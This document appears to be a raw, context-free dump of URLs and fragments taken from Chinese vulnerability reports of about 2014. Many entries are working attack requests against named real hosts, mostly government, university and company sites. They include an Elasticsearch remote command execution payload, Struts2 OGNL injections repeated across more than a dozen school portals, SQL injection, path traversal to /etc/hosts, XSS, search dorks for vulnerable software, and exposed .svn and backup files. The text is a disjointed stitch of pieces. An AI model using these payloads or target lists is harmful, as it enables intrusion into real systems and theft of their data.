http://market.chanjet.com/index.php/Login/index http://www.njmuseum.com/HistoryEventList.aspx?menuid=3a42129e-e005-49b4-b88c-6df94b4bc873 http://chatservice.352.com/plugins/blossom/messagelog/searchMessageLog.do?callback= www.352.com/communication/download.do?path=/data/blossom/uploadfiles/member/ http://219.239.97.51/chinacc/search2.asp?ClassID=&Field=&Keyword=1%27%22&page=2 http://219.239.97.51:80/chinacc/search2.asp?ClassID=&Field=&Keyword=1&page=2 http://www.zoheng.net/)开发的某套CMS程序用于多数网站,并且存在同一注入漏洞。 inurl:news_display.php http://cloud.189.cn/u/xxx http://cloud.189.cn/u/1 http://api.stage.smartlionapp.com/ http://yqjyj.gov.cn/admin.php http://mis.gtxy.cn/xsgzgl http://www.scgyjt.gov.cn/zxft/ft/1/admin/login.asp http://www.scgyjt.gov.cn/zxft/ft/1/ http://web1.psych.ac.cn/admin/MakeTopictoHTML.php?channelID=22 inurl:ShowNewsPageAction.do?newsID= http://www.gu.zjut.edu.cn/ShowNewsPageAction.do?newsID=3824 http://www.sqlmap.org www.gu.zjut.edu.cn\session http://erp.laipin.com/admin/page!login.action http://www.sce.tsinghua.edu.cn/news/detail.jsp?id1=2054 http://www.sce.tsinghua.edu.cn/sceadmin/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=/../ www.sce.tsinghua.edu.cn http://szxc.gdcct.gov.cn/article.php?country_id=807&id=11340&lm=news http://www.urpsoft.com/index.jsp)开发的高校系统多用于就业网,其中某处(detail.jsp?seq=)存在通用型SQL注入漏洞,涉及的学校包括首都师范大学、浙江大学、清华大学、中央民族大学等多个就业信息网。导致可以使数据库信息泄漏。 http://**.**.**/jyw/detail.jspseq=3932_ http://**.**.**/jyw/detail.jspseq=1967_ http://**.**.**/jyw_zc/detail.jspseq=2222_ http://**.**.**/jyw_new/detail.jspseq=1873_ http://**.**.**/jyw_old/detail.jspseq=1788 http://sjic.hust.edu.cn/wp-login.php http://218.106.133.143:80/ITindex.asp https://kyfw.12306.cn/otn/forgetPassword/initforgetMyPassword http://211.68.68.197/opac_two/search2/s_detail.jsp?sid=01h0279576 http://www.bcrj.com.cn/ 
http://dir.minigame.qq.com/cgi-bin/dir_fetch_qqhead/get_player_info?callback=success_jsonpCallback1&uin=&_=1401588334716 http://dir.minigame.qq.com/cgi-bin/dir_fetch_qqhead/get_player_info?callback=success_jsonpCallback1&uin=&_=1401588334716 http://www.wyn88.com/user/login.html inurl:ws2004 http://WEBSITE/ws2004/sysManage/Resource/add/addResource.asp?FunID=192 http://WEBSITE/ws2004/sysManage/Resource/add/addResource.asp?FunID=192 http://www.fzjcxx.cn/ http://lnjpgz.com/ http://www.cgyz.net.cn/ http://www.yygy.net/ http://www.sdjnzx.com/ http://www.zjk2z.cn/ http://www.sdjnzx.com/ http://www.hwsyxx.com/ http://sgtjb.com/ http://www.tadyzx.com/ http://www.gzsjx.cn/ http://www.yygy.net/ http://www.sdjnzx.com/ http://www.zjgzjzx.cn/ http://www.hn26z.com/ http://www.wuai.lwedu.sh.cn/ http://www.yzsx.net.cn/ http://ms.baihe.com/send?toid=76690391 http://wistone.com/news.php?year=2013 http://wooyun.org/bugs/wooyun-2014-057374 http://wooyun.org/bugs/wooyun-2014-057319 http://xgxy.cug.edu.cn/wp-admin/ http://www.hk603.com/downLoad.php?path=./../admintool/DB_config.php http://cee.gov.cn/UploadFile/ http://eii.jlu.edu.cn/guanli/ http://eii.jlu.edu.cn/guanli/update_dongtai.php?id=1016 http://home.focus.cn/newscenter/videonew/videoshow.php?id=41020 http://ohhmystyle.com/phpinfo.php http://ohhmystyle.com/product.php?productid=23794 http://222.184.79.39:88/admin/index.asp intext:megasoft http://www.189dw.com:8081为例 http://www.xxx.com:8081/common/jsp/file.jsp http://www.189dw.com:8081/positionmap.mapemployee.do?stimeid=0.4427834945057538&positionmap_smobile=手机号码~ http://www.189dw.com:8081/positionmap.newsms.do?ui_key=positionmap-sendsms-pop&ui_tokey=&ui_tohref=%2Fpositionmap.no.do%3F&ui_toform=&positionmap_smobile=手机号@&手机号@ http://219.239.97.51/en/tt12.asp?ClassID=74&page=81&SpecialID= http://app.easou.com/cat.e?key=%E7%B3%BB%E7%BB%9F%E5%AE%89%E5%85%A8&sortMode=1&l=$pl1&esid=QghUYDj8ostpvy&wver=ta&fr=148 http://data.flurry.com/aap.do 
http://house.focus.cn/reviewhouse/review_forum_detail.php?user_id=48299521 http://sh.focus.cn/entrance.php?m=common/private/modules/admin/controllers&c=admin_manage&a=public_init http://www1.nuc.edu.cn/jwc/eWebEditor/ http://www1.nuc.edu.cn/jwc/eWebEditor/ http://www.cr20gf.com/qn/InfoQingchun_news.asp?id=21 http://www.cr20gf.com/qn/system/login.asp http://www.tehang.com/articlelist.aspx?cid=4 http://www.aipu114.com/ http://tv.sohu.com/vip/ http://zhuanlan.zhihu.com/wooyun/19760786 http://www.gzgwbn.com.cn/ http://tw.cr15g.com/CN/DeptInfo.aspx?&DeptId=1 http://www.zt163.cn/tradesshow.php?pid=276 http://www.baidu.com/s?wd=inurl%3Aid%20%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%3A%E4%B8%89%E4%BB%A5%E7%BD%91%E7%BB%9C&pn=0&oq=inurl%3Aid%20%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%3A%E4%B8%89%E4%BB%A5%E7%BD%91%E7%BB%9C&tn=91553692_hao_pg&ie=utf-8 http://www.crssg.com/ppryshow.php?list=348 http://m.nuomi.com/ inurl:spdt_listSp.action http://www.stzwzx.com/spdt/spdt_listSp.action?deptId=009574019&menu=4 http://idcht.com/newsshow1.php?id=38 http://signin.fj.vnet.cn/login.aspx http://www.wuyixz.gov.cn/site/services/searchresult.jsp?key=6yMOeKnq&type=0 http://www.google.de/#newwindow=1&q=inurl:site%2Fabout%2Findex.jsp%3Fid%3D http://www.google.de/#newwindow=1&q=inurl:site%2Fabout%2Findex.jsp%3Fid%3D http://www.wuyixz.gov.cn/site/consult/showgzpy.jsp?act=docreate&deptid=y2qXdGBO&deptname=&star= http://www.instrument.com.cn/ask/MyAskList.aspx?usernaem=hstudent&type=1 http://www.siteserver.cn/case/54.html http://cms.demo.siteyun.cn/siteserver/login.aspx http://www.minjiao.com/ http://www.minjiao.com/html/anli/anlis/ http://web.ptjy.com/web/web_programs_dotnet/member/ http://www.zzyxjy.com/Web/Web_Programs_DotNet/Member/ http://school.mwedu.gov.cn/web/web_programs_dotnet/Member/ http://school.gledu.gov.cn/web/web_programs_dotnet/Member/ http://school.zzlwjy.com/web/web_programs_dotnet/member/ http://school.fjhajy.net/web/web_programs_dotnet/member/ 
http://schoolweb.ctjy.net/web/web_programs_dotnet/member/ http://school.fjjyjy.net/web/web_programs_dotnet/member/ http://www.ptedu.gov.cn/web/web_programs_dotnet/member/ www.qledu.gov.cn/web/web_programs_dotnet/Member/ http://web.ptjy.com/web/web_programs_dotnet/member/ http://web.ptjy.com/web/web_programs_dotnet/member/Default.aspx http://www.gdmc.edu.cn/news/view.php?id=12490 http://heyuan.gdrtvu.edu.cn/netstudy/login.asp http://api2.sfbest.com/icbc/pay.php?orderId=1406029521835410&type= http://hbzxpx.ec.com.cn/logout.action http://202.119.189.236:8085/ACTIONSHOWBOARD.APPPROCESS?mode=2&BoardFileID=2436%20%20 http://www.cccyjc.com/News_Detail.asp?News_BigClass_ID=5&News_SmallClass_ID=25&News_ID=61 http://219.243.47.169:9200/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}},%22script_fields%22:{%22exp%22:{%22script%22:%22import%20java.util.*;\nimport%20java.io.*;\nString%20str%20=%20\%22\%22;BufferedReader%20br%20=%20new%20BufferedReader%28new%20InputStreamReader%28Runtime.getRuntime%28%29.exec%28\%22uname%20-a\%22%29.getInputStream%28%29%29%29;StringBuilder%20sb%20=%20new%20StringBuilder%28%29;while%28%28str=br.readLine%28%29%29!=null%29{sb.append%28str%29;}sb.toString%28%29;%22 http://down.sj.2144.cn/sj/20140408/PlumberCrack_142301.apk?100&p=Android&f_name=&ext=apk&fitto=Android%20Android2.2%E5%8F%8A%E4%BB%A5%E4%B8%8A%E4%BB%A5%E4%B8%8A&f_id=-1139637542 http://qhdimg.focus.cn/common/app/include/configs/1.php http://u.uzai.com/mobile/register http://bh.2144.cn/news?action=index&id=6 http://bh.2144.cn/news?action=index&id=6&page=2 http://bh.2144.cn/gl?action=index&id=2 http://bh.2144.cn/gl?action=index&id=2&page=2 http://www.dascomsoft.com/website/index.aspx inurl:portalView.do?menuNavKey 
http://zy.ybzj.com:8080/suite/portal/portalView.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://219.220.176.101/suite/portal/portalView.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://zyzx.trzy.cn:8077/suite/portal/portalView.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://xqdg.gdgm.edu.cn/suite/portal/portalView.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D 
http://210.36.158.170/suite/sperc/portalView.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://222.180.192.2:8901/suite/skills/portalView.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://zxxx.czmec.cn:8080/suite/skills/portalView.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://suite.yxgcx.com/suite/portal/portalView.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D 
http://61.191.23.103:8009/suite/portal/portalView.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://116.252.173.100:9080/skills/portal/portalView.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://jpkc.gdcp.cn/skills/sperc/portalView.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://218.4.60.155/skills/portal/portalView.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D 
http://114.242.94.168/suite/jpkc/portalView.dohttp://218.4.60.155/skills/portal/portalView.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://125.222.104.50/suite/portal/portalView.do?siteKey=0&redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://zypt.lnpc.edu.cn/suite/portal/portalView.do?siteKey=0&redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://202.109.191.9/skills/portal/portalView.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D 
http://course.stfi.cn/skills/portal/portalView.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://dascom.svtcc.edu.cn/suite/skills/portalView.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://dm.2144.cn/e/extend/search_ajax.php http://www.phpoa.cn http://cloud.dlink.com.cn/login.aspx http://a.gleague.com.cn http://a.gleague.com.cn/FCKeditor/editor/filemanager/connectors/test.html inurl:managerOneGgxxfb.action http://www.baidu.com/s?wd=inurl%3AmanagerOneGgxxfb.action&pn=0&oq=inurl%3AmanagerOneGgxxfb.action&tn=91553692_hao_pg&ie=utf-8 http://ecard.tjufe.edu.cn/managerOneGgxxfb.action?fbxxid=8a7b7b8739716b38013980942bf30007 http://ykt.wh.sdu.edu.cn/xykcx/managerOneGgxxfb.action?fbxxid=4a42a8b237f00d4f013801503c620003 http://ecard.jxust.cn/managerOneGgxxfb.action?fbxxid=5ad708b230ac13800130b9d6a5dd0001 http://www.ykt.sdnu.edu.cn/managerOneGgxxfb.action?fbxxid=52ac88953fc239d5013fc78d81b00001 http://ecard.sdu.edu.cn/managerOneGgxxfb.action?fbxxid=53d6b69231bd74d701321dccda080014 http://www.ecard.ldu.edu.cn/managerOneGgxxfb.action?fbxxid=4a42b0f33381c4f90133d468e6d40003 http://ecard.tyut.edu.cn/managerOneGgxxfb.action?fbxxid=40288103281f3a4c01281f7568460002 
http://card.dgpt.edu.cn/managerOneGgxxfb.action?fbxxid=2c90838b33cfa83d0133d057c4ad0016 http://ecard.sdwz.cn/managerOneGgxxfb.action?fbxxid=2c918186341c2a1d013421a9de060011 http://ecard.hbmu.edu.cn/managerOneGgxxfb.action?fbxxid=5a45b1842aebd214012b5aeb89180002 http://ecard.hycollege.net/managerOneGgxxfb.action?fbxxid=40287e8627d600d40127dce2af050001 http://ecard.sjtu.edu.cn/managerOneGgxxfb.action?fbxxid=4af8bf441cd2052e011ce024bae60001 http://ecard.tjufe.edu.cn/managerOneGgxxfb.action?fbxxid=8a7b7b8739482fb301396bd58bd3000a http://localhost/ http://www.ci.gxnu.edu.cn/article/showdown.asp?soft_id=62 http://www.ci.gxnu.edu.cn/article/showdown.asp?soft_id=61 http://www.ci.gxnu.edu.cn/article/showdown.asp?soft_id=* http://www.hnnc.gov.cn,湖南农村网,多位用户密码为弱口令,其中有admin,但都权限不足,无法获得webshell: http://www.ca-ict.org/en/login.asp?action=login sud.whu.edu.cn/wp-login.php http://58.221.238.243:8808/dflzjszxcp/employee_toLogin.do http://etg.qq.com/ http://etg.qq.com/billboard/minsite/etg.shtml?fu=http%3A%2F%2Fa.paipai.com%2f%26size%3D1024x768%26time%3D0 http://zheye.cc/2248和http://zheye.cc/2250 http://zheye.cc/index.php/Home/Index/dele_address_ajax?aid=228877 http://finance.sina.com.hk/cgi-bin/forex/calculate.cgi http://db.duowan.com/zhtw/spells.php?c=11&s=393 http://db.duowan.com/zhtw/spells.php?c=11&s=165 http://drops.wooyun.org/papers/2035 http://www.zgyythy.com/manage/login.asp http://localhost/74cms_utf8/upload/plus/ajax_user.php http://xjxl.chsi.com.cn/images/photoForLQK/E59950E(51F68)B64CE040007F010008F1 http://xjxl.chsi.com.cn/images/photoForLQK/E59950E(2EBF3)B64CE040007F010008F1 http://xjxl.chsi.com.cn/images/photoForLQK/E59950E(3DC5F)B64CE040007F010008F1 http://xjxl.chsi.com.cn/images/photoForLQK/E5623F7(91022)FB37E040007F0100552A http://xjxl.chsi.com.cn/images/photoForLQK/E5623F7(61003)FB37E040007F0100552A http://xjxl.chsi.com.cn/images/photoForLQK/E5623F7(71002)FB37E040007F0100552A http://xjxl.chsi.com.cn/images/photoForLQK/E5623F7(71001)FB37E040007F0100552A 
http://xjxl.chsi.com.cn/images/photoForLQK/E5623F7(71000)FB37E040007F0100552A http://job.bjut.edu.cn/bjutCms/toLoginPage.action www.ca-ict.org/china-asean/en/login.asp?action=login www.ca-ict.org/new/dx_week_en/tt12.asp?ClassID=74&page=183&SpecialID= www.ca-ict.org/dx_week_en/tt12.asp?ClassID=1 http://222.223.232.226/goods/findgoodsInfo.action?goodsType1= http://ncfile.focus.cn/common/modules/bbsadm/trans_domain_app.php?page=499&app=1 http://ncfile.focus.cn/common/modules/dmc/adm/rdistnsPYpl http://ncfile.focus.cn/common/modules/dmc/votehouse_view.left.inc http://ncfile.focus.cn/common/dao/dao.tpl.php http://ncfile.focus.cn/common/admin/test.php http://ncfile.focus.cn/common/modules/bbsadm/trans_domain_app.php?page=499&app=1%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12%20limit%200,1--+ http://www.21education.com.cn/gynews.asp?Id=98 http://www.21education.com.cn/newsInfo.asp?id=171 http://www.21education.com.cn/AlInfo.asp?id=107 http://www.21education.com.cn/yeNewsInfo.asp?id=94 http://www.21education.com.cn/NewsInfoa.asp?id=158 http://support.chanjet.com/support.rar http://support.chanjet.com/kbm/kbmedit3.asp?iKbmID=42156 http://support.chanjet.com/kbm/kbmedit3.asp?iKbmID=42156 http://support.chanjet.com/kbm/kbmedit3.asp?iKbmID=42156 http://dir.minigame.qq.com/cgi-bin/gamevip_fetch_vip_info_mini?playerUin= http://wooyun.org/bugs/wooyun-2014-062111 http://wooyun.org/bugs/wooyun-2014-062946 http://wap.cnmo.com/mobile_para.php?title=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&productid=157026&type=1 http://www.xxrfb.gov.cn/ http://pay.wan.7k7k.com/ http://pay.wan.7k7k.com/webmanage/login.php https://202.116.1.123:8443/default.html?dc=1401785777442 http://202.116.1.160/dashboard.php?ddreset=1&sid=0796817f0e06b551 http://bbs.xgo.com.cn/user/albumpiclist_1657493_216086_1.html http://www.yiban.cn/findpass/set,即可进行密码重置了。 http://u1.huatu.com/jiangxi/wj/%EF%BD%97%EF%BD%8F%EF%BD%84%EF%BD%85.txt 
http://event21.dota2.com.cn//dota2/hopelight/dota2Hopelight!getTopPrize.action https://licai.baidu.com/user/0/info_repair/0?service_type=&ru=/cashdesk/0/pay/0?item_id=4,如果用户之前使用过百度钱包,进行过实名信息登记,那么身份证号码和姓名以及密保问题都会在上面明文显示。 http://biz.news.hexun.com/ssxs/default.aspx?zn=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&zt=guzhiqihuo http://biz.news.hexun.com/ssxs/stock_ifr.aspx?t=qh1401&w=920 http://biz.news.hexun.com/ssxs/list2.aspx?zt=stockyearqh1401&w=900 http://www.smrs.gov.cn/news/index.asp?new_id=7 http://www.hx2000.com.cn/ http://www.gldjyq.cn:8133/yqgl/HOME/City/default.asp?acode=4503 http://219.159.68.143/HOME/Region/default.asp?acode=450101 http://219.159.68.143/HOME/forum/default.asp?acode=4501 http://yqzb.wdjyzx.com/home/Region/default.asp?acode=371081-049 http://www.topsi.net.cn/ http://www.slin-gift.com/news_show.php?id=32 http://www.sqlmap.org www.slin-gift.com\session http://amd.sinano.ac.cn/news_show.php?id=1 http://www.sqlmap.org http://webmail.now.cn/readme.txt里面的一些信息,还有 http://webmail.now.cn/.svn/entries http://webmail.now.cn/webmail/help/.svn/entries http://webmail.now.cn/mobile/manager/.svn/entries http://webmail.now.cn/mobile/.svn/entries http://webmail.now.cn/webmail/.svn/entries http://210.192.123.172:8089/cesu/show_test_result.php?id=1401791499 http://shop.xunlei.com/test.txt http://act.shop.xunlei.com/xlrouter/,想抽个迅雷路由器玩玩!然后就开始了下面的测试! 
http://image.shop.xunlei.com/objects/swfupload.swf,记得某大牛说过这种可以修改后缀上传任意文件,我抄起我的菜刀就上了,各种改后缀,然后再审查元素看看,然后发现了 http://www.cclinux.com/ http://test.crazygame.cn/v2014/ http://test.crazygame.cn/v2014/user/user_my_meet_add_form.asp http://test.crazygame.cn/v2014/meet/meet_detail.asp?id=328 http://test.crazygame.cn/v2014/user/user_my_album_collection_mdy_form.asp?id=49 http://test.crazygame.cn/v2014/album/album_detail.asp?id=49 http://nubs.nju.edu.cn/1.rar http://nubs.nju.edu.cn/index.php.bak http://dm.2144.cn/comic/9275/721.html?type=z http://dm.2144.cn/comic/9275/718.html?type=z http://dm.2144.cn/comic/9275/720.html?type=z http://dm.2144.cn/comic/9275/719.html?type=z http://dm.2144.cn/comic/9275/717.html?type=z http://dm.2144.cn/comic/9275/716.html?type=z http://dm.2144.cn/comic/9275/715.html?type=z http://dm.2144.cn/comic/9275/714.html?type=z http://dm.2144.cn/hzw/search.php?keyword=a http://act.2144.cn/yinyue/mp3/down.php?f=../../../../../../../../../../../../../../../../etc/hosts www.plaj.gov.cn http://www.plaj.gov.cn/login.asp http://221.1.82.110:10001/1.rar http://221.1.82.110:10001/登录地址 inurl:ACTIONSHOWNEWS,可以搜索到好多。 http://qfoa.qfkd.com.cn/setqfkd/login.aspx http://221.193.212.49:8184/ygweb/login.jsp http://221.193.212.49:8184/ygweb/loginAction.do?Flag=look&guid=45c676a2-d7c4-48e3-8f99-3e004c6c72dc http://weipai.baidu.com/photo/community/getrelateinfo?event_id=-1 http://182.131.21.137/ccnt-apply/admin/business/preview/business-preview!lookUrlRFID.action inurl:col13/articleinfo.php?infoid= http://www.zjrzfy.gov.cn/ http://www.zjzy.gov.cn/ http://www.jsjrfy.gov.cn/ http://www.njng.gov.cn/ http://www.jsrepc.com/ http://www.sundy-whcy.com/ http://www.njlsjjjc.gov.cn/溧水纪检监察网 http://www.jzscxh.com/ http://www.jnkjj.gov.cn/江宁科技局 http://www.jszlyy.com.cn/江苏省肿瘤医院 http://cxy.jnkjj.gov.cn/江宁区产学研合作信息网 http://admin.xxx.gov.cn/general/ http://www.zjrzfy.gov.cn/col8/articleinfo.php?infoid=1088 bi.inspur.com/cwbase/BIAppCenter/Default.aspx?KeyWord=Z inurl:/Download?url=/uploadFiles 
http://www.qyny.gov.cn/Download?url=/uploadFiles/2011-11/1322624214093.doc http://www.syny.net/Download?url=/uploadFiles/2008-11/1227413949437.doc http://www.ldnj110.gov.cn/Download?url=/uploadFiles/2014-03/1393809650714.doc http://www.wzsnw.gov.cn/Download?url=/uploadFiles/2013-06/1371198755376.pdf http://www.goldagri.com/Download?url=/uploadFiles/2014-05/2014%CE%DE%B9%AB%BA%A6%C5%A9%B2%FA%C6%B7%B2%FA%B5%D8%C8%CF%B6%A8%D3%EB%B2%FA%C6%B7%C8%CF%D6%A4%CA%D7%B4%CE%C8%CF%D6%A4%C9%EA%B1%A8%B2%C4%C1%CF%A3%A8%D6%D6%D6%B2%D2%B5%A1%A2%D0%F3%C4%C1%D2%B5%A3%A9.doc http://www.sojump.com/wjx/manage/myask.aspx http://www.sojump.com/wjx/viewsupport.aspx?id=消息的ID号码 site:2010.ceair.com filetype:pdf site:2010.ceair.com filetype:xls site:2010.ceair.com filetype:doc http://www.ouou.com/jsp/index_mv.jsp?id=12132015 https://218.62.79.234/user/requireLogin http://www.itopdog.cn/home.php?contentid=1%20%20OR%20%60is_verify%60=1%20LIMIT%201%20--%20&ac=comment&ct=home http://www.itopdog.cn/home.php?ct=home&ac=search&q="/ www.wooyun.org http://www0.ceair.com/muecard/pages/system/login/mainFrame.jsp http://cg.chaoxing.com/ www.tourzj.gov.cn/ 